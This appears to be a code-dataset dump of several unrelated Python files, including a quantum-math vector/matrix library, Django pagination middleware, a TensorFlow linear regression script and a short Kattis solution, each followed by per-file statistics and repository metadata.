router.register(r'users', views.UserViewSet)
urlpatterns = [
url(r'^prices/(?P<mid>[0-9]+)/$', views.PriceList.as_view()),
url(r'^', include(router.urls)),
]
| 22.058824 | 72 | 0.72 | 52 | 375 | 5.153846 | 0.653846 | 0.029851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006192 | 0.138667 | 375 | 16 | 73 | 23.4375 | 0.823529 | 0.186667 | 0 | 0 | 0 | 0 | 0.10299 | 0.083056 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c73899f8a7a4e6cae0196f83d72e8c2a0f1bcf4 | 18,505 | py | Python | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | 1 | 2019-12-04T13:45:14.000Z | 2019-12-04T13:45:14.000Z | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | null | null | null | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | null | null | null | from random import random, sample
from .Qerrors import DimensionError, GenericLogiqError, InitializationError
from .qtils import equal, isScalar, math, mod_square, np
#### Qmath.py
#
# This file contains 2 classes that wrap the numpy.matrix class: the vector and the matrix class,
# it contains also other mathematical functions used in the classes.
# (In the future, these 2 classes could be refactored and became the subclasses of a superclass "linobj")
#
####
# ↓↓↓↓↓↓↓↓↓↓↓↓ Add the npm() method to the np.matrix class ↓↓↓↓↓↓↓↓↓↓↓↓ #
def _npm(self):
return self
setattr(np.matrix, 'npm', _npm)
# ↑↑↑↑↑↑↑↑↑↑↑↑ Add the npm() method to the np.matrix class ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Kronecker product functions ↓↓↓↓↓↓↓↓↓↓↓↓ #
def kron(m1, m2):
"Return the Kronecker product between `m1` and `m2` \n(`m1` and `m2` must be `vector` or `matrix`, otherwise they can be a `np.matrix`)"
try: npm1 = m1.npm() ; npm2 = m2.npm()
except AttributeError: raise TypeError("The types of the inputs must be vector or matrix")
return select_type(np.kron(npm1, npm2))
def nkron(m, n):
"Apply the Kronecker product `n` times: `(m @ m @ ... @ m)` for `n` times"
if n<1: return matrix((1)) #[[1]] @ x = x
out = m
for _ in range(n-1):
out = kron(out, m)
return out
# ↑↑↑↑↑↑↑↑↑↑↑↑ Kronecker product functions ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Other useful functions ↓↓↓↓↓↓↓↓↓↓↓↓ #
def select_type(item):
if len(item.shape) == 0:
return item
elif item.shape == (1,1):
return item[0,0] #scalar
elif min(item.shape) == 1:
return vector(item, no_cpy=True)#vector
else:
return matrix(item, no_cpy=True)#matrix
class npmath:
# Methods to use, safely, standard operators between scalars, vector, matrix and numpy.matrix
@staticmethod
def safe_npm(x):
try: return x if isScalar(x) else x.npm()
except: raise TypeError("'"+str(type(x))+"' is an invalid type")
@staticmethod
def _fun(x, y, fun):
return select_type( fun(npmath.safe_npm(x), npmath.safe_npm(y)) )
@staticmethod
def add(x, y):
return npmath._fun(x, y, lambda x,y: x+y)
@staticmethod
def sub(x, y):
return npmath._fun(x, y, lambda x,y: x-y)
@staticmethod
def mul(x, y):
return npmath._fun(x, y, lambda x,y: x*y)
@staticmethod
def div(x, y):
return npmath._fun(x, y, lambda x,y: x/y)
@staticmethod
def equal(x, y):
if isScalar(x) or isScalar(y): return x == y
try: x = x.npm() ; y = y.npm()
except: return False
return npmath.np_equal(x, y)
@staticmethod
def np_equal(x, y):
if x.shape != y.shape: return False
for i in range(x.shape[0]):
for j in range(x.shape[1]):
if x[i,j] != y[i,j]: return False
return True
# ↑↑↑↑↑↑↑↑↑↑↑↑ Other useful functions ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ vector class ↓↓↓↓↓↓↓↓↓↓↓↓ #
class vector:
"""
+ `v`: describes the value of this vector, it can be every kind of object allowed from `numpy.matrix` constructor, or another vector (in that case it will be copied)
+ `normalize` (optional): if True this vector will normalize (i.e. his norm became 1)
+ `values2round` (optional): a list where the value inside will be rounded for example if `values2round=[1]` and the vector is `[1.00001, 12.00001]` it becomes `[1, 12.00001]` (this according to the global precision)
"""
def __init__(self, v, normalize = False, values2round = None, no_cpy = False):
try:
if isinstance(v, (np.matrix, vector, matrix)):
self.vect = v.npm() if no_cpy else np.matrix(v.npm())
else:
self.vect = np.matrix(v, complex)
if min(self.vect.shape) != 1:
raise DimensionError('A vector must be have only one dimension')
except Exception as e:
raise InitializationError('Error to initialize the vector', e)
if normalize: self.normalize()
if values2round is not None: self.round_error(values2round)
def npm(self):
"""
Return the reference of the `numpy.matrix` associated
Watch out: it return the reference of the vector (for performance reason), so if you want to modify it first copy it.
"""
return self.vect
def isRow(self):
"`True` if the vector is a 'row vector'"
return self.vect.shape[0] == 1
def isCol(self):
"`True` if the vector is a 'column vector'"
return self.vect.shape[1] == 1
def round_error(self, values):
"""Round the error (using `equals()`) of values in `values`.\n
For example if `values = (0,1)` and this vector is `|5, 0.9999998>` it may became `|5, 1>`"""
for i in range(len(self)):
for v in values:
if equal(self[i], v):
self[i] = v
elif equal(self[i].real, 0) or equal(self[i].imag, 0):
self[i] = complex( 0 if equal(self[i].real, 0) else self[i].real, 0 if equal(self[i].imag, 0) else self[i].imag )
def norm(self):
"Return the norm of this vector, defined as `sqrt(<v|v>)`"
return math.sqrt(sum(mod_square(x) for x in self))
def normalize(self):
"Normalize this vector (i.e. his norm became 1)"
d = self.norm()
if d==0: raise DimensionError("The null vector isn't normalizable")
for i in range(len(self)):
self[i] /= d
return self
def __pos__(self):
return self
def __neg__(self):
return vector(self.vect.__neg__(), no_cpy=True)
def __len__(self):
return max(self.vect.shape)
def __getitem__(self, i):
try:
item = self.vect[0, i] if self.isRow() else self.vect[i, 0]
return vector(item) if isinstance(i, slice) else item
except IndexError:
raise IndexError("Index out of bound (i="+str(i)+" and vector's length = "+str(len(self))+")")
def __setitem__(self, i, value):
try:
if self.isRow(): self.vect[0, i] = value
else: self.vect[i, 0] = value
except IndexError:
raise IndexError("Index out of bound (i="+str(i)+" and vector's length = "+str(len(self))+")")
def _vector_op(self, v, fun):
#BUG: numpy.complex128 + v = np.array
if isinstance(v, vector):
if v.vect.shape != self.vect.shape: raise DimensionError("The vector's lengths must be equal")
return vector(fun(self.vect, v.vect), no_cpy=True)
elif isScalar(v):
return vector(fun(self.vect, v), no_cpy=True)
else: raise TypeError('Other member must be a vector or a scalar')
def __add__(self, v):
try:
return self._vector_op(v, lambda x,y: x+y)
except Exception as e:
raise GenericLogiqError('Unable to sum', e)
def __radd__(self, v):
try:
return self._vector_op(v, lambda x,y: y+x)
except Exception as e:
raise GenericLogiqError('Unable to sum', e)
def __sub__(self, v):
try:
return self._vector_op(v, lambda x,y: x-y)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __rsub__(self, v):
try:
return self._vector_op(v, lambda x,y: y-x)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __mul__(self, v):
npv = npmath.safe_npm(v)
return select_type(self.vect * npv)
def __rmul__(self, v):
npv = npmath.safe_npm(v)
return select_type(npv * self.vect)
def __truediv__(self, v):
npv = npmath.safe_npm(v)
return select_type(self.vect / npv)
def __rtruediv__(self, v):
npv = npmath.safe_npm(v)
return select_type(npv / self.vect)
def __matmul__(self, v):
if isinstance(v, int): return nkron(self, v)
return kron(self, v)
def __eq__(self, v):
if isinstance(v, (vector, matrix, np.matrix)):
return npmath.np_equal(self.vect, v.npm())
else:
return False
def __invert__(self): #conjugate transpose
return vector(self.vect.H)
def transpose(self):
"Transform this vector into its transpose"
self.vect = self.vect.T
def conj(self):
"Transform this vector into its conjugate transpose"
self.vect = self.vect.H
def __getattr__(self, name):
if name in 'tT': return vector(self.vect.T)
elif name in 'hH': return ~self
elif name == 'shape': return self.vect.shape
raise AttributeError("'vector' object has no attribute '"+name+"'")
def __hash__(self):
return hash(str(self.vect))
def __str__(self):
braket = "<|>"
i = self.isCol()
return braket[i] + "; ".join(str(self[i]) for i in range(len(self))) + braket[i+1]
def __repr__(self):
return str(self)
@staticmethod
def random(dim):
"Return a random complex vector long `dim`"
rsign = lambda: sample((1,-1), 1)[0]
return vector([complex(rsign()*random(), rsign()*random()) for _ in range(dim)])
# ↑↑↑↑↑↑↑↑↑↑↑↑ vector class ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Useful vector constructors ↓↓↓↓↓↓↓↓↓↓↓↓ #
def roundedVector(v, values2round=(0,1,-1)):
"Generate a vector with the values in `values2round` rounded"
return vector(v, values2round=values2round)
class ket(vector):
"""A shortcut to create a column vector
Usage: `ket(x0, x1, ..., xn)`"""
def __init__(self, *values):
if len(values) == 1: values = values[0]
super().__init__(values)
if self.isRow():
if isinstance(values, vector): self.conj() #transformation from ket to bra
else: self.transpose() #no transformation, only creating a vector column
class bra(vector):
"""A shortcut to create a row vector
Usage: `bra(x0, x1, ..., xn)`"""
def __init__(self, *values):
if len(values) == 1: values = values[0]
super().__init__(values)
if self.isCol():
if isinstance(values, vector): self.conj() #transformation from ket to bra
else: self.transpose() #no transformation, only creating a vector column
# ↑↑↑↑↑↑↑↑↑↑↑↑ Useful vector constructors ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ matrix class ↓↓↓↓↓↓↓↓↓↓↓↓ #
class matrix:
"""
+ `M`: describes the value of this vector, it can be every kind of object allowed to `numpy.matrix` constructor, or another matrix (in that case it will be copied)
+ `values2round` (optional): a list where the value inside will be rounded, for example if `values2round=[1]` and the matrix is `[[1.00001, 12.00001],[0.3,1.12]]` it becomes `[[1, 12.00001],[0.3,1.12]]` (this according to the global precision)
"""
def __init__(self, M, values2round = None, no_cpy = False):
try:
if isinstance(M, (np.matrix, matrix, vector)):
self.mtx = M.npm() if no_cpy else np.matrix(M.npm())
else:
try:
if isinstance(M[0], ket):
M = [[M[j][i] for j in range(len(M))] for i in range(len(M[0]))]
except: pass
finally:
self.mtx = np.matrix(M, complex)
except Exception as e:
raise InitializationError('Error to initialize the matrix', e)
if values2round is not None: self.round_error(values2round)
def round_error(self, values):
"""Round the error (using `equals()`) of values in `values`.
For example if `values = (0,1)` and this matrix is `[[5, 0.9999998],[-0.000001, 0.1]]` it may became `[[5, 1],[0, 0.1]]`"""
for i in range(self.shape[0]):
for j in range(self.shape[1]):
for v in values:
if equal(self[i, j], v): self[i, j] = v
def isUnitary(self):
"`True` if this matrix is unitary"
return self.mtx.shape[0] % self.mtx.shape[1] == 0 and np.allclose(np.eye(self.mtx.shape[0]), self.mtx.H * self.mtx)
def isOrthonormal(self):
"`True` if this matrix is orthonormal"
_, r = np.linalg.qr(self.mtx)
for i in range(len(self)):
for j in range(i, len(self)):
if i==j: continue
elif not equal(r[i,j], 0):
return False
return True
def nomr(self):
"return the norm of this matrix"
return np.linalg.norm(self.mtx)
def det(self):
"Return the determinant of this matrix"
return np.linalg.det(self.mtx)
def npm(self):
"""
Return the reference of the `numpy.matrix` associated.
Watch out: it return the reference of the matrix (for performance reason), so if you want to modify it first copy it.
"""
return self.mtx
def __pos__(self):
return self
def __neg__(self):
return matrix(self.mtx.__neg__(), no_cpy=True)
def __getitem__(self, i):
try:
return select_type(self.mtx[i])
except IndexError:
raise IndexError("Index out of bound (request="+str(i)+", shape="+str(self.shape)+")")
def __setitem__(self, i, value):
self.mtx[i] = value
def _matrix_op(self, M, fun):
#BUG: numpy.complex128 + M = np.array
if isinstance(M, matrix):
if M.shape != self.shape: raise DimensionError("The matrices' shapes must be equal")
return matrix(fun(self.mtx, M.mtx), no_cpy=True)
elif isScalar(M):
return matrix(fun(self.mtx, M), no_cpy=True)
else: raise TypeError('Other member must be a matrix or a scalar')
def __add__(self, M):
try:
return self._matrix_op(M, lambda x,y: x+y)
except Exception as e:
raise GenericLogiqError('Unable to add', e)
def __radd__(self, M):
try:
return self._matrix_op(M, lambda x,y: y+x)
except Exception as e:
raise GenericLogiqError('Unable to add', e)
def __sub__(self, M):
try:
return self._matrix_op(M, lambda x,y: x-y)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __rsub__(self, M):
try:
return self._matrix_op(M, lambda x,y: y-x)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __mul__(self, M):
npm = npmath.safe_npm(M)
return select_type(self.mtx * npm)
def __rmul__(self, M):
npm = npmath.safe_npm(M)
return select_type(npm * self.mtx)
def __truediv__(self, M):
npm = npmath.safe_npm(M)
return select_type(self.mtx / npm)
def __rtruediv__(self, M):
npm = npmath.safe_npm(M)
return select_type(npm / self.mtx)
def __matmul__(self, M):
if isinstance(M, int): return nkron(self, M)
return kron(self, M)
def __eq__(self, M):
if isinstance(M, (vector, matrix, np.matrix)):
return npmath.np_equal(self.npm(), M.npm())
else:
return False
def __invert__(self):
return matrix(self.mtx.H)
def transpose(self):
"Transform this matrix into its transpose"
self.mtx = self.mtx.T
def conj(self):
"Transform this matrix into its conjugate transpose"
self.mtx = self.mtx.H
def __getattr__(self, name):
if name in 'tT': return matrix(self.mtx.T)
elif name in 'hH': return ~self
elif name == 'shape': return self.mtx.shape
raise AttributeError("'matrix' object has no attribute '"+name+"'")
def __hash__(self):
return hash(str(self.mtx)) #fast hash
def __str__(self):
return str(self.mtx)
def __repr__(self):
return str(self)
@staticmethod
def Id(n):
"Return an `n X n` identity matrix"
return matrix(np.identity(n), no_cpy=True)
@staticmethod
def filled(shape, val=0):
"""Creates a matrix `shape[0] X shape[1]` filled with the value in `val`
NB: if shape is a natural number, the matrix will be a square matrix `shape X shape`"""
if isinstance(shape, int): shape = (shape, shape)
if val == 0:
return matrix(np.zeros(shape, complex), no_cpy=True)
elif val == 1:
return matrix(np.ones(shape, complex), no_cpy=True)
else:
M = matrix(np.empty(shape, complex), no_cpy=True)
for i in range(M.shape[0]):
for j in range(M.shape[0]):
M[i,j] = val
return M
@staticmethod
def random(shape):
"Return a random complex matrix according to the given shape"
if isinstance(shape, int): shape = (shape, shape)
rsign = lambda: sample((1,-1), 1)[0]
return matrix([[complex(rsign()*random(), rsign()*random()) for _ in range(shape[0])] for _ in range(shape[1])])
@staticmethod
def rand_unitary(dim):
# (from scipy)
random_state = np.random
z = 1/math.sqrt(2)*(random_state.normal(size=(dim, dim)) + 1j*random_state.normal(size=(dim, dim)))
q, r = np.linalg.qr(z)
d = r.diagonal()
q *= d/abs(d)
return matrix(q, no_cpy=True)
@staticmethod
def rand_orthonormal(dim):
# (from scipy)
random_state = np.random
H = np.eye(dim)
D = np.ones((dim,))
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
D[n-1] = np.sign(x[0])
x[0] -= D[n-1]*np.sqrt((x*x).sum())
# Householder transformation
Hx = (np.eye(dim-n+1) - 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
# Fix the last sign such that the determinant is 1
D[-1] = (-1)**(1-(dim % 2))*D.prod()
# Equivalent to np.dot(np.diag(D), H) but faster, apparently
H = (D*H.T).T
return matrix(H, no_cpy=True)
# ↑↑↑↑↑↑↑↑↑↑↑↑ matrix class ↑↑↑↑↑↑↑↑↑↑↑↑ #
| 30.187602 | 247 | 0.565685 | 2,583 | 18,505 | 4.056523 | 0.125048 | 0.006299 | 0.012025 | 0.017179 | 0.563562 | 0.479481 | 0.412006 | 0.38347 | 0.333842 | 0.304066 | 0 | 0.016294 | 0.296893 | 18,505 | 612 | 248 | 30.236928 | 0.76689 | 0.226533 | 0 | 0.343243 | 0 | 0.005405 | 0.106474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0.002703 | 0.008108 | 0.048649 | 0.440541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c7b005e76d1d272f859bd8434eb849b792f547e | 1,349 | py | Python | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 1 | 2020-04-21T15:09:18.000Z | 2020-04-21T15:09:18.000Z | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 70 | 2019-04-10T22:32:32.000Z | 2022-03-11T23:12:54.000Z | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 1 | 2019-04-12T14:55:39.000Z | 2019-04-12T14:55:39.000Z | import asyncio
def get_page(self):
"""
A function which will be monkeypatched onto the request to get the current
integer representing the current page.
"""
try:
if self.POST:
p = self.POST['page']
else:
p = self.GET['page']
if p == 'last':
return 'last'
return int(p)
except (KeyError, ValueError, TypeError):
return 1
def pagination_middleware(get_response):
if asyncio.iscoroutinefunction(get_response):
return AsyncPaginationMiddleware(get_response)
return PaginationMiddleware(get_response)
class PaginationMiddleware:
"""
Inserts a variable representing the current page onto the request object if
it exists in either **GET** or **POST** portions of the request.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
request.page = get_page(request)
return self.get_response(request)
class AsyncPaginationMiddleware:
_is_coroutine = asyncio.coroutines._is_coroutine
def __init__(self, get_response):
self.get_response = get_response
async def __call__(self, request):
request.page = get_page(request)
return await self.get_response(request)
pagination_middleware.async_capable = True
| 25.942308 | 79 | 0.673091 | 157 | 1,349 | 5.541401 | 0.369427 | 0.151724 | 0.103448 | 0.05977 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0 | 0.000985 | 0.247591 | 1,349 | 51 | 80 | 26.45098 | 0.856158 | 0.188288 | 0 | 0.2 | 0 | 0 | 0.015152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.033333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5c7dd017cb985d2be70863e2a6c94eef99b97a29 | 11,416 | py | Python | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | '''
Created on Aug 10, 2018
@author: Juan Reina
@contact: juanmr82@gmail.com
This module uses tensorflow on a dataset to implement a multivarian linear regression.
The following input arguments are needed and for practical purposes, in CSV format
and only float values
1. File name. Must be specified with -i
2. Column number to be used as Output. It must specified with -y
3. Learning rate. It must be specified with -a
4. Nr of training epochs, specified with -t
5. If file contains header with -H
In this version, the script doesnt do model validation or data plotting,
it is simply a demonstration of Tensorflow to quickly iterate through a
CSV file, the use of the Data APU and iterators
'''
from com.pybsoft.eteach.regression import *
import getopt
import sys
import pandas as pd
def get_arguments(argv):
'''
@return: Key Map containing the user arguments
'''
argumentMap = {}
try:
ops, args = getopt.getopt(argv, "hHei:y:a:t:", [])
except getopt.GetoptError:
print("Error in arguments")
print("mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>")
sys.exit(2)
if (ops.__len__() == 0):
print("No arguments were specified. Please use the sctipt like this:")
print("mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>")
sys.exit(2)
for op, arg in ops:
if (op == "-h"):
print("\n"
"Usage:\n"
"mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>\n"
"-i File Name with input data.\n"
"-y Within the file, which column has the output/result for the regression\n"
"-a Learning rate. Must be a real value\n"
"\n")
sys.exit()
if (op == "-h"):
argumentMap["header"] = True
if (op == "-i"):
argumentMap["file_path"] = arg
if (op == "-t"):
try:
argumentMap["epochs"] = int(arg)
if(argumentMap["epochs"]<1):
print("Error. Nr of epochs must be a natural number greater than zero")
print("Finishing script")
sys.exit(2)
except ValueError:
print("Error. Nr of epochs must be a natural number greater than zero")
print("Finishing script")
sys.exit(2)
if (op == "-y"):
try:
y = int(arg)
if (y <= 0):
print("Output column index/number cant be less than zero")
sys.exit(2)
argumentMap["y_col_nr"] = y
except ValueError:
print("Error. Output column index/number must be integer!!!!")
print("Finishing script")
sys.exit(2)
if (op == "-a"):
try:
a = float(arg)
argumentMap["alpha"] = a
except ValueError:
print("Error. Output column index/number must be integer/float!!!!")
print("Finishing script")
sys.exit(2)
# Check if the arguments are correct
if (argumentMap.get("file_path", None) is None):
print("Error. File Path was not specified")
print("Finishing script")
if (argumentMap.get("y_col_nr", None) is None):
print("Error. Output/Answer Column number was not specified")
print("Finishing script")
if (argumentMap.get("alpha", None) is None):
print("Error. Learning rate was not specified")
print("Finishing script")
if (argumentMap.get("header", None) is None):
argumentMap["header"]=False
return argumentMap
def pack_features(features, labels):
'''
This code is based on the function with the same name
in the Custom training: walkthrough section in the
Tensorflow website
@return: Pack of features and label as a stacked tensor instead as a dictionary of tensors
'''
#My addition to the function. Cast data to float32
for k,v in features.items():
features[k] = tf.cast(features[k], dtype=tf.float32, name=k)
features = tf.stack(list(features.values()), axis=1)
return features, labels
def main(argv):
'''
Defining a main function, in my opinion, can help other people to understand my code
'''
# Get the arguments from the console and return a key-mmap
arguments = get_arguments(argv)
# Ath this point the arguments syntaxt is correct. The script doesnt know yet if the
# file does actually exists, has the correct number of columns and the correct format
# Following assumptions are done:
# 1. The first row contains the column names
# 2. It is CSV Format
# 3. All data are integer/float
print("STARTING SCRIPT")
print("")
print("Analyzing the input data file at ",arguments["file_path"])
data_file=None
nr_rows,nr_columns = (0,0)
mean_values,max_values,min_values=(None,None,None)
try:
data_file = pd.read_csv(arguments["file_path"],sep='\s+|\t+|,|;',engine='python',header=None)
#Get the number of files and columns, and the min, max and mean of each separated column
nr_rows,nr_columns =data_file.shape
mean_values = data_file.iloc[:,:].mean()
max_values = data_file.iloc[:,:].max()
min_values = data_file.iloc[:,:].min()
except:
print("Error reading file ",arguments["file_path"], "for processing")
print("FINISHING SCRIPT")
sys.exit(2)
#Displaying the data in a user friendly way
print("Summary of data:" )
print("File header: ",arguments["header"])
print("Nr Rows: %d and Nr Columns: %d" % (nr_rows,nr_columns))
print("Mean value per column:",[mean_values[i] for i in range(nr_columns)])
print("Max value per column:", [max_values[i] for i in range(nr_columns)])
print("Min value per column:",[min_values[i] for i in range(nr_columns)])
print("")
print("Defining the data import strategy, the model and its optimizer")
#Inner FUnctions for the normalization of the data
def normalize_data(features, labels):
'''
Mapping function to define feature normalization
'''
i = 0
for k,v in features.items():
features[k] = (features[k]-mean_values[i])/(max_values[i]-min_values[i])
i = i+1
labels = (labels-mean_values[nr_columns-1])/(max_values[nr_columns-1]-min_values[nr_columns-1])
return features, labels
'''
End of Function
'''
'''
@todo: Improve this very lazy Dataset batch size selection strategy or let the user to choose its own batch size
'''
if(nr_rows>1000):
batch= 320
elif(nr_rows >100):
batch = 32
elif(nr_rows>1):
batch = 1
#Preparing Dataset Carachteristics
label_name = "Y"
col_names = ["Col%d"%(i) for i in range(nr_columns)]
col_names[nr_columns-1] = label_name
features_names = col_names[:-1]
'''
@todo: Improve the delimiter selection. Probably a regex
'''
#Creating Dataset from CSV File and adding pre-processing info
dataset = tf.contrib.data.make_csv_dataset(arguments["file_path"],
batch_size=batch,
shuffle=False,
num_epochs=1,
column_names=col_names,
label_name=label_name,
header=arguments["header"],
field_delim='\t')
#dataset = dataset.batch(batch,drop_remainder=True)
dataset = dataset.map(normalize_data)
dataset = dataset.map(pack_features)
'''
In this part of the code, the Model, the iterator through the file and the optimizer are defined
'''
#Creating iterator though the data
#Initializable allow us to re-initialize this iterator after each epoch
iterator = dataset.make_initializable_iterator()
X,Y = iterator.get_next()
W = tf.Variable([[nmp.random.rand() for i in range(nr_columns-1)]],dtype=tf.float32,name="WeightMatrix")
b = tf.Variable(tf.zeros([1]),dtype=tf.float32,name="bias")
#The model
hypothesis = tf.matmul(W, X, transpose_b=True) + b
#Necessary to allow the difference of matrixes when batch > 1
Y = tf.transpose(Y)
#Cost/loss function
cost_function = tf.reduce_sum(tf.squared_difference(Y,hypothesis))/(2*nr_rows)
#Optimizer function with learning rate
grad_descent = tf.train.GradientDescentOptimizer(arguments["alpha"]).minimize(cost_function)
#Initializer
init_vars = tf.global_variables_initializer()
'''
The definition of the Model and nodes is over. Now comes the session definition
'''
print("Starting training session")
with tf.Session() as sess:
print("Initializationg variables")
sess.run(init_vars)
print("Initial values of linear model:")
print("W:",sess.run(W))
print("b:",sess.run(b))
print("Running the model with ",arguments["epochs"], "epochs")
i = 0
j=0
cost = 0
'''
Although the number of epochs steps can be defined in the dataset definition,
I left it there as 1:
The reason for this is that this gives me the possibility to signal the end of
the iteration of the file with a tf.errors.OutOfRangeError exception and store/show
the cost/loss value for plotting or to store it on a CSV output file
'''
for i in range(arguments["epochs"]):
#Start/Re-start iterator
sess.run(iterator.initializer)
while True:
try:
_,cost,ys,yt=sess.run([grad_descent,cost_function,Y,hypothesis])
except tf.errors.OutOfRangeError:
#suma = suma/(2*nr_rows)
if(i%50 ==0):
print("Epoch ",i,"ended with loss/cost value of ",cost )
break
i=i+1
print("")
print("Fininshing with cost/loss value of", cost)
print("Final values of linear model:")
print("W:",sess.run(W))
print("b:",sess.run(b))
sess.close()
print("FINISHING SCRIPT")
'''
@todo: Model validation
@todo: Plotting of cost function values
@todo: Exporting training session statistics into a CSV file or serialize it as a JSON Object
'''
# EXECUTION STARTS HERE
if __name__ == "__main__":
main(sys.argv[1:])
| 37.676568 | 122 | 0.567537 | 1,423 | 11,416 | 4.481377 | 0.260014 | 0.018347 | 0.028226 | 0.01035 | 0.178767 | 0.1634 | 0.151482 | 0.148189 | 0.133448 | 0.094402 | 0 | 0.009728 | 0.333655 | 11,416 | 302 | 123 | 37.801325 | 0.828579 | 0.190872 | 0 | 0.278107 | 0 | 0.017751 | 0.223974 | 0 | 0 | 0 | 0 | 0.016556 | 0 | 1 | 0.023669 | false | 0 | 0.029586 | 0 | 0.071006 | 0.272189 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c7eab84cedcd9a684eaec97ef3ab71e3134b344 | 287 | py | Python | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | li = []
nli = []
n = int(input())
for i in range(n):
li.append(input())
nli.append([i])
a=0
#print(nli)
for i in range(n-1):
a,b = map(int,input().split())
a-=1
b-=1
nli[a]+=nli[b]
nli[b] = []
res = ""
for i in range(n):
print(li[nli[a][i]],sep='',end='') | 16.882353 | 38 | 0.484321 | 55 | 287 | 2.527273 | 0.363636 | 0.086331 | 0.129496 | 0.23741 | 0.258993 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018349 | 0.240418 | 287 | 17 | 38 | 16.882353 | 0.619266 | 0.034843 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c7fadc6def96acb36e9f974704042ce02aa463a | 2,356 | py | Python | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
